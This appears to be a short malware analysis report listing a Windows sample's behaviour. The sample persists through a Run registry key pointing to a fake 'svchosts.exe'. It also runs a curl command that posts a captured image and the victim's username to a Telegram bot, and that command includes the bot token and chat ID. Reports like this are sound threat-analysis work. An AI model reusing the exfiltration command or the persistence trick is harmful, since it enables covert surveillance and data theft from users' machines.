Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'svchosts' = '<SYSTEM32>\svchosts.exe '
- <SYSTEM32>\svchosts.exe
- <SYSTEM32>\curl.exe
- %TEMP%\ehuehue.jpg
- 'ap#.##legram.org':443
- DNS ASK ap#.##legram.org
- ClassName: 'EDIT' WindowName: ''
- '<SYSTEM32>\svchosts.exe'
- '<SYSTEM32>\curl.exe' -s -X POST "https://api.telegram.org/bot553811558:AAGnh33NZm4rdxEP6Tpxua1o-ErkMrtZOOI/sendPhoto" -F chat_id=-1001375751186 -F photo="@%TEMP%\ehuehue.jpg" -F caption="0 - #%USERNAME% - #0409 - #...